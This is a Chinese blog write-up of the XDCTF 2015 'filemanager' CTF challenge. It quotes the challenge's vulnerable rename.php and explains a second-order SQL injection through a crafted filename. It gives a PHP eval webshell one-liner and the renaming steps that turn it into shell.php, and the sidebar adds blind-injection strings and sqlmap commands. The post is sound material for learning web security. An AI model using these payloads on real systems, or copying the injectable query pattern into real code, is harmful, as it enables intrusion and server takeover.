CTF之filemanager

最新推荐文章于 2024-06-02 15:58:33 发布
最新推荐文章于 2024-06-02 15:58:33 发布
阅读量183 收藏 1
点赞数 10
分类专栏: ctf 文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74263993/article/details/137211971
版权

 这种题一看就是文件上传漏洞

 

 进行目录遍历一下,发现了/www.tar.gz,就一个压缩包,但是这个压缩包里便是这个网页的php代码备份,可以访问下载下来分析分析

 对文件进行代码审计,发现漏洞在修改文件名的文件(rename.php)中

<?php
/**
 * Created by PhpStorm.
 * User: phithon
 * Date: 15/10/14
 * Time: 下午9:39
 */

require_once "common.inc.php";

if (isset($req['oldname']) && isset($req['newname'])) {
	$result = $db->query("select * from `file` where `filename`='{$req['oldname']}'");
	if ($result->num_rows > 0) {
		$result = $result->fetch_assoc();
	} else {
		exit("old file doesn't exists!");
	}

	if ($result) {

		$req['newname'] = basename($req['newname']);
		$re = $db->query("update `file` set `filename`='{$req['newname']}', `oldname`='{$result['filename']}' where `fid`={$result['fid']}");
		if (!$re) {
			print_r($db->error);
			exit;
		}
		$oldname = UPLOAD_DIR . $result["filename"] . $result["extension"];
		$newname = UPLOAD_DIR . $req["newname"] . $result["extension"];
		if (file_exists($oldname)) {
			rename($oldname, $newname);
		}
		$url = "/" . $newname;
		echo "Your file is rename, url:
                <a href=\"{$url}\" target='_blank'>{$url}</a><br/>
                <a href=\"/\">go back</a>";
	}
}
?>

 首先会查询之前上传的文件是否存在,如果返回不为空,则修改成对应的文件名。在修改文件名的过程中,是存在漏洞的。

上传一个空的文件,但是文件名一定要是’,extension='.jpg,因为原来的SQL语句不允许修改后缀名,对后缀名进行了限制,使用这个名字是为了是修改的文件后缀名为空

存入数据库的filename是',extension=',extension是jpg

然后修改文件名

 

再上传一个名字为shell.jpg木嘛文件<?php @eval($_POST['aaa']) ?>

然后对shell.jpg.jpg进行改名

 然后系统会把木嘛文件shell.jpg改名成shell.php

 

 接下来就是用蚁剑进行连接了

便得到了

flag{bdda3c944a9e484eae50123afeeff56b}

小黑子不会打篮球
关注
  • 10
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
攻防世界 web高手进阶区 8分题 filemanager
闵行小鱼塘
10-04 1048
继续ctf的旅程,开始攻防世界web高手进阶区的8分题,本文是filemanager的writeup
CTF之二维码扫描.7z
12-02
CTF入门之二维码扫描神器,支持二维码修复
filemanager攻防世界web进阶 ctf
wuyaowangchuan的博客
11-29 1387
进入环境 看样子是文件上传 扫描目录 /www.tar.gz可以获得源码 先来代码审计 数据结构 T NAMES utf8; SET FOREIGN_KEY_CHECKS = 0; DROP DATABASE IF EXISTS `xdctf`; CREATE DATABASE xdctf; USE xdctf; DROP TABLE IF EXISTS `file`; CREATE TABLE `file` ( `fid` int(10) unsigned NOT NULL AUTO_IN.
BUUCTF:[XDCTF 2015]filemanager
末初的CSDN博客
07-26 1514
题目地址:https://buuoj.cn/challenges#[XDCTF%202015]filemanager 首先网站目录下/www.tar.gz是隐藏源码文件 xdctf.sql:数据库表结构 common.inc.php对所有传入的参数进行了addslashes()转义 upload.php上传的文件名经过: $file[‘name’] -> pathinfo() –> $path_parts["filename"] -> addslashes() -> inser
BUUCTF:[XDCTF 2015]filemanager
Keepb1ue的博客
08-03 3263
靶场地址: https://buuoj.cn/challenges#[XDCTF%202015]filemanager 题目首页给出了源码: https://github.com/CTFTraining/xdctf_2015_filemanager 而在这道题中也存在源码泄露: 这道题主要还是考察代码审计和二次注入: 网站结构源码解析: 数据库结构: xdctf.sql SET NAMES utf8; SET FOREIGN_KEY_CHECKS = 0; DROP DATABASE IF EXISTS
[XDCTF 2015]filemanager
fmyyy1的博客
05-23 604
www.tar.gz下载到源码。 结构 审计后发现有很多对数据库的操作,猜测存在注入。 文件名采取白名单对后缀名过滤,不能直接上传php文件,upload.php里面对文件名进行了addslashes转义,不存在直接注入。 commom.inc.php中对所有请求参数也进行了转义 看到rename.php <?php /** * Created by PhpStorm. * User: phithon * Date: 15/10/14 * Time: 下午9:39 */ requir
攻防世界--filemanager
qq_46263951的博客
01-05 1226
看到这里猜测是个文件上传漏洞,测试几次发现好像只能上传图片,rename只能更改文件名,但无法更改后缀。 随手扫了一下发现源码泄漏, 审阅rename代码 <?php /** * Created by PhpStorm. * User: phithon * Date: 15/10/14 * Time: 下午9:39 */ require_once "common.inc.php"; if (isset($req['oldname']) && isset..
CTFHUB WEBSITE WEBMANAGER 通关
qq_43338937的博客
09-11 325
考点 ssrf 布尔盲注 测试登录页面 username参数位置可以进行布尔盲注 手工测试 a" or sleep(2)--+ 参数使用post提交 保存数据包 利用sqlmap工具进行注入获取数据库 表 用户密码 python3 sqlmap.py -r a.txt --data="username=a&password=a" -p username --curent-db python3 sqlmap.py -r a.txt --data="username=
攻防世界-WEB-filemanager
m0_52061428的博客
06-01 683
人道是,我心错付情深处,以为两情皆如初。奈何春风扶柳意,独我梦中空自舞。许久未见诸位,这段时间由于学业与其他事情,便没再继续写下去(其实很大一部分归咎于自己的懒惰//DOGE)这次带来一道开胃小菜,希望能够帮到各位师傅们,也希望得到大家的指点。
php 文件下载 ctf,i春秋——“百度杯”CTF比赛 十月场——GetFlag(md5碰撞、文件包含、网站绝对路径)...
weixin_35901163的博客
03-26 369
需要提交的captcha满足等式,肯定就是MD5碰撞了附上脚本1 import hashlib234 def func(md5_val):5 for x in range(1,100000000):6 md5_value=hashlib.md5(str(x)).hexdigest()7 if md5_value[:6]==md5_val:8 ...
CTF之GIF图片分离工具
02-23
misc方向直接GIF图片分离
ctf之图片隐写
06-09
CTF题目中,图片隐写题属于杂项的一部分,题目较为简单。本文大致梳理了下CTF比赛中图片隐写题的常用套路,如果未能看出题目破题点,可按照以下方法顺序逐一尝试。
ctf之misc所需要工具
06-05
基本包含了所有misc所需要的工具,还有很多在线工具,自行百度即可 (绝对不吃亏,如果还觉得少了请联系我)
ctf解题之杂项.zip
10-07
里面包含图片隐写术,压缩包破解工具,wireshark,音频分析文件,Winhex进制编辑器,文件分离等
Docker 安全及日志管理
最新发布
2301_77081516的博客
06-02 265
虚拟机通过添加 Hypervisor 层,虚拟出网卡、内存、CPU 等虚拟硬件,再在其上建立虚拟机,每个虚拟机都有自己的系统内核。而 Docker 容器则是通过隔离的方式,将文件系统、 进程、设备、网络等资源进行隔离,再对权限、CPU 资源等进行控制,最终让容器之间互不影响,容器无法影响宿主机。容器与宿主机共享内核、文件系统、硬件等资源。
内网安全之证书模版的管理
weixin_45910629的博客
05-29 1045
证书模板 Certificate templates 是 CA 证书颁发机构的一个组成部分,是证书策略中的重要元素,是用于证书注册、使用和管理的一组规则和格式。当 CA 收到对证书的请求时,必须对该请求应用一组规则和设置,以执行所请求的功能,例如证书颁发或更新。这些规则可以是简单的,也可以是复杂的,也可以适用于所有用户或特定的用户组。证书模板是在 CA 上配置并应用于传入证书请求的一组规则和设置。证书模板还向客户机提供了关于如何创建和提交有效的证书请求的说明。基于证书模板的证书只能由企业 CA 颁发。
掌控安全CTF-2024年5月擂台赛-WP(部分)
ASD830的博客
05-27 1119
如果实在没看到的话(或者扫不出来),可以放stegsolve里面看看,red plane 3,够清晰了吧哈哈哈。
企业如何安全的使用U盘
feng_321_的博客
05-29 578
U盘的随意使用可能导致未经授权的人员随意插拔U盘,增加了信息泄露的风险。对于已经确定的内部使用的U盘,可以对U盘进行加密,拷贝到U 盘里面的文件,然后他如果说把U盘拿出去用是需要先格式化的格式化完之后,才可以用。如果员工使用的U盘感染了病毒,那么病毒可能会通过U盘传播到企业的计算机系统中,导致系统瘫痪、数据损坏甚至丢失。:使用专门的设备控制软件,如安秉网盾终端管理系统,可以灵活地管理和控制USB设备的使用权限,指定哪些U盘可以使用,哪些不能使用。员工随意使用U盘可能会导致工作流程混乱,影响工作效率。
ctf之bsp文件分享
10-02
ctf之bsp文件分享是一种常见的技术手段,用于在计算机安全领域进行攻击和渗透测试。它的原理是将恶意代码隐藏在一个看似正常的文件中,如图片、文档等,利用文件的解析漏洞或执行特定操作后,执行恶意代码实现攻击...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值